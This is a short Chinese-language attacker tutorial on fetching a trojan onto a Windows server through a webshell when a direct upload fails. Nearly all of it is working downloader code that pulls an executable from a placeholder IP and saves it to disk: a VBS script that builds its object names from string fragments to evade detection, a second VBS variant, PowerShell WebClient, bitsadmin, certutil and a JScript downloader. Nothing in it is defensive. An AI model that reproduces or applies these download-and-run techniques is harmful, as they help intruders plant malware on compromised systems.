有时候通过webshell会遇到无法上传马的现象,那么,可以试试通过shell创建个文件,然后后缀名为vbs,
通过vbs脚本下载远程木马。下载后,通过webshell的命令执行尝试。
代码如下:
————————————————————————-
On Error Resume Next:Dim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe或者新建vbs脚本如下:
Set post=CreateObject("Msxml2.XMLHTTP")
post.Open "GET","http://xxx.xxx.xxx.xxx/1.exe"
post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
wscript.sleep 3000
aGet.Write(post.responseBody)
aGet.SaveToFile "1.exe",2或者使用powershell下载
powershell -Command "(New-Object Net.WebClient).DownloadFile("http://xxx.xxx.xxx.xxx/1.exe","1.exe")或者使用bitsadmin.exe
bitsadmin.exe /transfer "test" http://xxx.xxx.xxx.xxx/1.exe C:\1.exe或者使用certutil
certutil -urlcache -split -f http://xxx.xxx.xxx.xxx/1.exe 1.exe或者使用js下载
var objArgs=WScript.Arguments;
var sGet=new ActiveXObject("ADODB.Stream");
var xGet=null;
try{
xGet=new XMLHttpRequest();
}catch(e){
try{
xGet=new ActiveXObject("Msxml2.XMLHTTP");
}catch(ex){
try{
xGet=new ActiveXObject("Microsoft.XMLHTTP");
}catch(e3){
xGet=null;
}
}
}
if(xGet != null){
xGet.Open("GET","http://xxx.xxx.xxx.xxx/1.exe",0);
xGet.Send();
sGet.Mode=3;
sGet.Type=1;
sGet.Open();
sGet.Write(xGet.ResponseBody);
sGet.SaveToFile("1.exe",2);
}